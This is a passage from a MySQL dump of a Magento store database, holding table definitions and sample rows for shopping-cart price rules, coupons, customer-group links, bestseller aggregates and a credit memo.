(1555, 0),
(1555, 1),
(1556, 0),
(1556, 1),
(1557, 0),
(1557, 1),
(1558, 0),
(1558, 1),
(1559, 0),
(1559, 1),
(1560, 0),
(1560, 1),
(1561, 0),
(1561, 1),
(1562, 0),
(1562, 1),
(1563, 0),
(1563, 1),
(1564, 0),
(1564, 1),
(1565, 0),
(1565, 1),
(1566, 0),
(1566, 1),
(1567, 0),
(1567, 1),
(1568, 0),
(1568, 1),
(1569, 0),
(1569, 1),
(1570, 0),
(1570, 1),
(1571, 0),
(1571, 1),
(1572, 0),
(1572, 1),
(1573, 0),
(1573, 1),
(1574, 0),
(1574, 1),
(1575, 0),
(1575, 1),
(1576, 0),
(1576, 1),
(1577, 0),
(1577, 1),
(1578, 0),
(1578, 1),
(1579, 0),
(1579, 1),
(1580, 0),
(1580, 1),
(1581, 0),
(1581, 1),
(1582, 0),
(1582, 1),
(1583, 0),
(1583, 1),
(1584, 0),
(1584, 1),
(1585, 0),
(1585, 1),
(1586, 0),
(1586, 1),
(1587, 0),
(1587, 1),
(1588, 0),
(1588, 1),
(1589, 0),
(1589, 1),
(1590, 0),
(1590, 1),
(1591, 0),
(1591, 1),
(1592, 0),
(1592, 1),
(1593, 0),
(1593, 1),
(1594, 0),
(1594, 1),
(1595, 0),
(1595, 1),
(1596, 0),
(1596, 1),
(1597, 0),
(1597, 1),
(1598, 0),
(1598, 1),
(1599, 0),
(1599, 1),
(1600, 0),
(1600, 1),
(1601, 0),
(1601, 1),
(1602, 0),
(1602, 1),
(1603, 0),
(1603, 1),
(1604, 0),
(1604, 1),
(1605, 0),
(1605, 1),
(1606, 0),
(1606, 1),
(1607, 0),
(1607, 1),
(1608, 0),
(1608, 1),
(1609, 0),
(1609, 1),
(1610, 0),
(1610, 1),
(1611, 0),
(1611, 1),
(1612, 0),
(1612, 1),
(1613, 0),
(1613, 1),
(1614, 0),
(1614, 1),
(1615, 0),
(1615, 1),
(1616, 0),
(1616, 1),
(1617, 0),
(1617, 1),
(1618, 0),
(1618, 1),
(1619, 0),
(1619, 1),
(1620, 0),
(1620, 1),
(1621, 0),
(1621, 1),
(1622, 0),
(1622, 1),
(1623, 0),
(1623, 1),
(1624, 0),
(1624, 1),
(1625, 0),
(1625, 1),
(1626, 0),
(1626, 1),
(1627, 0),
(1627, 1),
(1628, 0),
(1628, 1),
(1629, 0),
(1629, 1),
(1630, 0),
(1630, 1),
(1631, 0),
(1631, 1),
(1632, 0),
(1632, 1),
(1633, 0),
(1633, 1),
(1634, 0),
(1634, 1),
(1635, 0),
(1635, 1),
(1636, 0),
(1636, 1),
(1637, 0),
(1637, 1),
(1638, 0),
(1638, 1),
(1639, 0),
(1639, 1),
(1640, 0),
(1640, 1),
(1641, 0),
(1641, 1),
(1642, 0),
(1642, 1),
(1643, 0),
(1643, 1),
(1644, 0),
(1644, 1),
(1645, 0),
(1645, 1);

-- --------------------------------------------------------

--
-- Table structure for table `salesrule`
--

CREATE TABLE `salesrule` (
  `rule_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `description` text DEFAULT NULL COMMENT 'Description',
  `from_date` date DEFAULT NULL COMMENT 'From',
  `to_date` date DEFAULT NULL COMMENT 'To',
  `uses_per_customer` int(11) NOT NULL DEFAULT 0 COMMENT 'Uses Per Customer',
  `is_active` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Is Active',
  `conditions_serialized` mediumtext DEFAULT NULL COMMENT 'Conditions Serialized',
  `actions_serialized` mediumtext DEFAULT NULL COMMENT 'Actions Serialized',
  `stop_rules_processing` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Stop Rules Processing',
  `is_advanced` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Is Advanced',
  `product_ids` text DEFAULT NULL COMMENT 'Product Ids',
  `sort_order` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort Order',
  `simple_action` varchar(32) DEFAULT NULL COMMENT 'Simple Action',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount',
  `discount_qty` decimal(12,4) DEFAULT NULL COMMENT 'Discount Qty',
  `discount_step` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Discount Step',
  `apply_to_shipping` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Apply To Shipping',
  `times_used` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Times Used',
  `is_rss` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Is Rss',
  `coupon_type` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Coupon Type',
  `use_auto_generation` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Use Auto Generation',
  `uses_per_coupon` int(11) NOT NULL DEFAULT 0 COMMENT 'User Per Coupon',
  `simple_free_shipping` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Simple Free Shipping'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Salesrule';

--
-- Dumping data for table `salesrule`
--

INSERT INTO `salesrule` (`rule_id`, `name`, `description`, `from_date`, `to_date`, `uses_per_customer`, `is_active`, `conditions_serialized`, `actions_serialized`, `stop_rules_processing`, `is_advanced`, `product_ids`, `sort_order`, `simple_action`, `discount_amount`, `discount_qty`, `discount_step`, `apply_to_shipping`, `times_used`, `is_rss`, `coupon_type`, `use_auto_generation`, `uses_per_coupon`, `simple_free_shipping`) VALUES
(1, 'Buy 3 tee shirts and get the 4th free', 'Buy 3 tee shirts and get the 4th free', NULL, NULL, 0, 1, '{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Found\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"category_ids\",\"operator\":\"()\",\"value\":\"30,21\",\"is_value_processed\":false,\"attribute_scope\":null}]}]}', '{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\"}', 0, 1, NULL, 0, 'buy_x_get_y', 1.0000, NULL, 3, 0, 2, 1, 1, 0, 0, 0),
(2, 'Spend $50 or more - shipping is free!', 'Free shipping on any purchase over $50', NULL, NULL, 0, 1, '{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Address\",\"attribute\":\"base_subtotal\",\"operator\":\">=\",\"value\":\"50\",\"is_value_processed\":false}]}', '{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\"}', 0, 1, NULL, 0, 'by_percent', 0.0000, NULL, 0, 0, 1, 1, 1, 0, 0, 2),
(3, '20% OFF Ever $200-plus purchase!*', 'Shopping cart price rule for the cart over $200. Does not applied on other sales items', NULL, NULL, 0, 1, '{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Address\",\"attribute\":\"base_subtotal\",\"operator\":\">=\",\"value\":\"200\",\"is_value_processed\":false}]}', '{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"0\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"category_ids\",\"operator\":\"==\",\"value\":\"11\",\"is_value_processed\":false,\"attribute_scope\":null},{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"sale\",\"operator\":\"==\",\"value\":\"1\",\"is_value_processed\":false,\"attribute_scope\":null}]}]}', 0, 1, NULL, 0, 'by_percent', 20.0000, NULL, 0, 0, 1, 1, 1, 0, 0, 0),
(4, '$4 Luma water bottle (save 70%)', 'Use promo code H20 at checkout', NULL, NULL, 1, 1, '{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Found\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\"}]}', '{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"sku\",\"operator\":\"==\",\"value\":\"24-UG06\",\"is_value_processed\":false,\"attribute_scope\":null}]}', 0, 1, NULL, 0, 'by_percent', 70.0000, NULL, 0, 0, 0, 1, 2, 0, 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `salesrule_coupon`
--

CREATE TABLE `salesrule_coupon` (
  `coupon_id` int(10) UNSIGNED NOT NULL COMMENT 'Coupon ID',
  `rule_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule ID',
  `code` varchar(255) DEFAULT NULL COMMENT 'Code',
  `usage_limit` int(10) UNSIGNED DEFAULT NULL COMMENT 'Usage Limit',
  `usage_per_customer` int(10) UNSIGNED DEFAULT NULL COMMENT 'Usage Per Customer',
  `times_used` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Times Used',
  `expiration_date` datetime DEFAULT NULL COMMENT 'Expiration Date',
  `is_primary` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Primary',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Coupon Code Creation Date',
  `type` smallint(6) DEFAULT 0 COMMENT 'Coupon Code Type',
  `generated_by_dotmailer` smallint(6) DEFAULT NULL COMMENT '1 = Generated by dotmailer'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Salesrule Coupon';

--
-- Dumping data for table `salesrule_coupon`
--

INSERT INTO `salesrule_coupon` (`coupon_id`, `rule_id`, `code`, `usage_limit`, `usage_per_customer`, `times_used`, `expiration_date`, `is_primary`, `created_at`, `type`, `generated_by_dotmailer`) VALUES
(1, 4, 'H20', NULL, 1, 0, NULL, 1, NULL, 0, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `salesrule_coupon_aggregated`
--

CREATE TABLE `salesrule_coupon_aggregated` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date NOT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `coupon_code` varchar(50) DEFAULT NULL COMMENT 'Coupon Code',
  `coupon_uses` int(11) NOT NULL DEFAULT 0 COMMENT 'Coupon Uses',
  `subtotal_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal Amount',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount',
  `total_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Amount',
  `subtotal_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal Amount Actual',
  `discount_amount_actual` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount Actual',
  `total_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Amount Actual',
  `rule_name` varchar(255) DEFAULT NULL COMMENT 'Rule Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Coupon Aggregated';

-- --------------------------------------------------------

--
-- Table structure for table `salesrule_coupon_aggregated_order`
--

CREATE TABLE `salesrule_coupon_aggregated_order` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date NOT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `coupon_code` varchar(50) DEFAULT NULL COMMENT 'Coupon Code',
  `coupon_uses` int(11) NOT NULL DEFAULT 0 COMMENT 'Coupon Uses',
  `subtotal_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal Amount',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount',
  `total_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Amount',
  `rule_name` varchar(255) DEFAULT NULL COMMENT 'Rule Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Coupon Aggregated Order';

-- --------------------------------------------------------

--
-- Table structure for table `salesrule_coupon_aggregated_updated`
--

CREATE TABLE `salesrule_coupon_aggregated_updated` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date NOT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `coupon_code` varchar(50) DEFAULT NULL COMMENT 'Coupon Code',
  `coupon_uses` int(11) NOT NULL DEFAULT 0 COMMENT 'Coupon Uses',
  `subtotal_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal Amount',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount',
  `total_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Amount',
  `subtotal_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal Amount Actual',
  `discount_amount_actual` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount Actual',
  `total_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Amount Actual',
  `rule_name` varchar(255) DEFAULT NULL COMMENT 'Rule Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Salesrule Coupon Aggregated Updated';

-- --------------------------------------------------------

--
-- Table structure for table `salesrule_coupon_usage`
--

CREATE TABLE `salesrule_coupon_usage` (
  `coupon_id` int(10) UNSIGNED NOT NULL COMMENT 'Coupon ID',
  `customer_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer ID',
  `times_used` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Times Used'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Salesrule Coupon Usage';

-- --------------------------------------------------------

--
-- Table structure for table `salesrule_customer`
--

CREATE TABLE `salesrule_customer` (
  `rule_customer_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule Customer ID',
  `rule_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rule ID',
  `customer_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer ID',
  `times_used` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Times Used'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Salesrule Customer';

--
-- Dumping data for table `salesrule_customer`
--

INSERT INTO `salesrule_customer` (`rule_customer_id`, `rule_id`, `customer_id`, `times_used`) VALUES
(1, 1, 1, 2);

-- --------------------------------------------------------

--
-- Table structure for table `salesrule_customer_group`
--

CREATE TABLE `salesrule_customer_group` (
  `rule_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer Group ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Rules To Customer Groups Relations';

--
-- Dumping data for table `salesrule_customer_group`
--

INSERT INTO `salesrule_customer_group` (`rule_id`, `customer_group_id`) VALUES
(1, 0),
(1, 1),
(1, 2),
(1, 3),
(2, 0),
(2, 1),
(2, 2),
(2, 3),
(3, 0),
(3, 1),
(3, 2),
(3, 3),
(4, 0),
(4, 1),
(4, 2),
(4, 3);

-- --------------------------------------------------------

--
-- Table structure for table `salesrule_label`
--

CREATE TABLE `salesrule_label` (
  `label_id` int(10) UNSIGNED NOT NULL COMMENT 'Label ID',
  `rule_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `label` varchar(255) DEFAULT NULL COMMENT 'Label'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Salesrule Label';

-- --------------------------------------------------------

--
-- Table structure for table `salesrule_product_attribute`
--

CREATE TABLE `salesrule_product_attribute` (
  `rule_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer Group ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Salesrule Product Attribute';

--
-- Dumping data for table `salesrule_product_attribute`
--

INSERT INTO `salesrule_product_attribute` (`rule_id`, `website_id`, `customer_group_id`, `attribute_id`) VALUES
(1, 1, 0, 105),
(1, 1, 1, 105),
(1, 1, 2, 105),
(1, 1, 3, 105),
(3, 1, 0, 105),
(3, 1, 0, 150),
(3, 1, 1, 105),
(3, 1, 1, 150),
(3, 1, 2, 105),
(3, 1, 2, 150),
(3, 1, 3, 105),
(3, 1, 3, 150),
(4, 1, 0, 74),
(4, 1, 1, 74),
(4, 1, 2, 74),
(4, 1, 3, 74);

-- --------------------------------------------------------

--
-- Table structure for table `salesrule_website`
--

CREATE TABLE `salesrule_website` (
  `rule_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Rules To Websites Relations';

--
-- Dumping data for table `salesrule_website`
--

INSERT INTO `salesrule_website` (`rule_id`, `website_id`) VALUES
(1, 1),
(2, 1),
(3, 1),
(4, 1);

-- --------------------------------------------------------

--
-- Table structure for table `sales_bestsellers_aggregated_daily`
--

CREATE TABLE `sales_bestsellers_aggregated_daily` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `product_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Product ID',
  `product_name` varchar(255) DEFAULT NULL COMMENT 'Product Name',
  `product_price` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Product Price',
  `qty_ordered` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Qty Ordered',
  `rating_pos` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating Pos'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Bestsellers Aggregated Daily';

--
-- Dumping data for table `sales_bestsellers_aggregated_daily`
--

INSERT INTO `sales_bestsellers_aggregated_daily` (`id`, `period`, `store_id`, `product_id`, `product_name`, `product_price`, `qty_ordered`, `rating_pos`) VALUES
(1, '2020-08-23', 1, 2062, 'new Ramy Mesta Guards', 234.0000, 1.0000, 1),
(2, '2020-08-23', 0, 2062, 'new Ramy Mesta Guards', 234.0000, 1.0000, 1);

-- --------------------------------------------------------

--
-- Table structure for table `sales_bestsellers_aggregated_monthly`
--

CREATE TABLE `sales_bestsellers_aggregated_monthly` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `product_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Product ID',
  `product_name` varchar(255) DEFAULT NULL COMMENT 'Product Name',
  `product_price` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Product Price',
  `qty_ordered` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Qty Ordered',
  `rating_pos` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating Pos'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Bestsellers Aggregated Monthly';

--
-- Dumping data for table `sales_bestsellers_aggregated_monthly`
--

INSERT INTO `sales_bestsellers_aggregated_monthly` (`id`, `period`, `store_id`, `product_id`, `product_name`, `product_price`, `qty_ordered`, `rating_pos`) VALUES
(1, '2020-08-01', 0, 2062, 'new Ramy Mesta Guards', 234.0000, 1.0000, 1),
(2, '2020-08-01', 1, 2062, 'new Ramy Mesta Guards', 234.0000, 1.0000, 1);

-- --------------------------------------------------------

--
-- Table structure for table `sales_bestsellers_aggregated_yearly`
--

CREATE TABLE `sales_bestsellers_aggregated_yearly` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `product_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Product ID',
  `product_name` varchar(255) DEFAULT NULL COMMENT 'Product Name',
  `product_price` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Product Price',
  `qty_ordered` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Qty Ordered',
  `rating_pos` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating Pos'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Bestsellers Aggregated Yearly';

--
-- Dumping data for table `sales_bestsellers_aggregated_yearly`
--

INSERT INTO `sales_bestsellers_aggregated_yearly` (`id`, `period`, `store_id`, `product_id`, `product_name`, `product_price`, `qty_ordered`, `rating_pos`) VALUES
(1, '2020-01-01', 0, 2062, 'new Ramy Mesta Guards', 234.0000, 1.0000, 1),
(2, '2020-01-01', 1, 2062, 'new Ramy Mesta Guards', 234.0000, 1.0000, 1);

-- --------------------------------------------------------

--
-- Table structure for table `sales_creditmemo`
--

CREATE TABLE `sales_creditmemo` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `adjustment_positive` decimal(20,4) DEFAULT NULL COMMENT 'Adjustment Positive',
  `base_shipping_tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Tax Amount',
  `store_to_order_rate` decimal(20,4) DEFAULT NULL COMMENT 'Store To Order Rate',
  `base_discount_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Amount',
  `base_to_order_rate` decimal(20,4) DEFAULT NULL COMMENT 'Base To Order Rate',
  `grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Grand Total',
  `base_adjustment_negative` decimal(20,4) DEFAULT NULL COMMENT 'Base Adjustment Negative',
  `base_subtotal_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal Incl Tax',
  `shipping_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Amount',
  `subtotal_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal Incl Tax',
  `adjustment_negative` decimal(20,4) DEFAULT NULL COMMENT 'Adjustment Negative',
  `base_shipping_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Amount',
  `store_to_base_rate` decimal(20,4) DEFAULT NULL COMMENT 'Store To Base Rate',
  `base_to_global_rate` decimal(20,4) DEFAULT NULL COMMENT 'Base To Global Rate',
  `base_adjustment` decimal(20,4) DEFAULT NULL COMMENT 'Base Adjustment',
  `base_subtotal` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal',
  `discount_amount` decimal(20,4) DEFAULT NULL COMMENT 'Discount Amount',
  `subtotal` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal',
  `adjustment` decimal(20,4) DEFAULT NULL COMMENT 'Adjustment',
  `base_grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Base Grand Total',
  `base_adjustment_positive` decimal(20,4) DEFAULT NULL COMMENT 'Base Adjustment Positive',
  `base_tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Tax Amount',
  `shipping_tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Tax Amount',
  `tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Tax Amount',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID',
  `email_sent` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Email Sent',
  `send_email` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Send Email',
  `creditmemo_status` int(11) DEFAULT NULL COMMENT 'Creditmemo Status',
  `state` int(11) DEFAULT NULL COMMENT 'State',
  `shipping_address_id` int(11) DEFAULT NULL COMMENT 'Shipping Address ID',
  `billing_address_id` int(11) DEFAULT NULL COMMENT 'Billing Address ID',
  `invoice_id` int(11) DEFAULT NULL COMMENT 'Invoice ID',
  `store_currency_code` varchar(3) DEFAULT NULL COMMENT 'Store Currency Code',
  `order_currency_code` varchar(3) DEFAULT NULL COMMENT 'Order Currency Code',
  `base_currency_code` varchar(3) DEFAULT NULL COMMENT 'Base Currency Code',
  `global_currency_code` varchar(3) DEFAULT NULL COMMENT 'Global Currency Code',
  `transaction_id` varchar(255) DEFAULT NULL COMMENT 'Transaction ID',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Amount',
  `base_discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Amount',
  `shipping_discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Discount Tax Compensation Amount',
  `base_shipping_discount_tax_compensation_amnt` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Discount Tax Compensation Amount',
  `shipping_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Incl Tax',
  `base_shipping_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Incl Tax',
  `discount_description` varchar(255) DEFAULT NULL COMMENT 'Discount Description',
  `customer_note` text DEFAULT NULL COMMENT 'Customer Note',
  `customer_note_notify` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Customer Note Notify'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Creditmemo';

--
-- Dumping data for table `sales_creditmemo`
--

INSERT INTO `sales_creditmemo` (`entity_id`, `store_id`, `adjustment_positive`, `base_shipping_tax_amount`, `store_to_order_rate`, `base_discount_amount`, `base_to_order_rate`, `grand_total`, `base_adjustment_negative`, `base_subtotal_incl_tax`, `shipping_amount`, `subtotal_incl_tax`, `adjustment_negative`, `base_shipping_amount`, `store_to_base_rate`, `base_to_global_rate`, `base_adjustment`, `base_subtotal`, `discount_amount`, `subtotal`, `adjustment`, `base_grand_total`, `base_adjustment_positive`, `base_tax_amount`, `shipping_tax_amount`, `tax_amount`, `order_id`, `email_sent`, `send_email`, `creditmemo_status`, `state`, `shipping_address_id`, `billing_address_id`, `invoice_id`, `store_currency_code`, `order_currency_code`, `base_currency_code`, `global_currency_code`, `transaction_id`, `increment_id`, `created_at`, `updated_at`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `discount_description`, `customer_note`, `customer_note_notify`) VALUES
(1, 1, NULL, 0.0000, 0.0000, 0.0000, 1.0000, 39.6400, NULL, 34.6400, 5.0000, 34.6400, NULL, 5.0000, 0.0000, 1.0000, 0.0000, 32.0000, 0.0000, 32.0000, 0.0000, 39.6400, NULL, 2.6400, 0.0000, 2.6400, 2, NULL, NULL, NULL, 2, 3, 4, NULL, 'BDT', 'BDT', 'BDT', 'BDT', NULL, '000000001', '2020-08-08 01:45:27', '2020-08-08 01:45:27', 0.0000, 0.0000, NULL, NULL, 5.0000, 5.0000, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `sales_creditmemo_comment`
--

CREATE TABLE `sales_creditmemo_comment` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
